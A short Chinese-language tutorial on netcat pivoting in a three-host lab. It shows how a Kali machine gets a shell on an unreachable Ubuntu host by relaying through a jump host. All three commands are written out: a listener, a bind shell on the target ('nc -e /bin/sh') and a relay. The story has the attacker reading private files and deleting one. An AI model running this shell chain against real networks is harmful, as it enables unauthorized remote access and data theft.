netcat内网代理实践

在企业里网络管控是很严格的,有很多堡垒机隔离了内网的不同主机,今天的主题是「内网代理」,我们的kali小黑兄弟,想要去ubuntu16拿点数据,但是发现路由不通。幸运的是,小黑可以访问ubuntu18,而ubuntu18又可以访问ubuntu16,这里的ubuntu18就相当于堡垒机,那么聪明你能帮助小黑建立到底ubuntu16的shell控制通道吗?

基本环境如下:

  • kali rolling:192.168.160.140
  • ubuntu18:192.168.160.137
  • ubuntu16:192.168.160.136

第一步:在kali rolling上操作

  • 这里监听自己的23333端口就好了
  • 完成第三步,就会自动获得ubuntu16的shell
  • 这里可以看到,ubuntu16上有隐私文档

nc -lvp 23333

img

第二步:在ubuntu16上操作

  • 这里就是将ubuntu16的shell通过23333端口弹出去
  • 不管谁访问ubuntu16的23333端口,都将获得shell

nc -lvp 23333 -e /bin/sh

img

第三步:在ubuntu18上操作

  • 这里首先获得ubuntu16的shell
  • 然后将shell重定向到kali rolling上去
  • 这个时候,小黑在kali rolling上就拿到了ubuntu16的shell啦
  • 于是,小黑轻松的删除了「小黑的缺点.txt」

nc -v 192.168.160.136 23333 -c "nc -v 192.168.160.140 23333"

img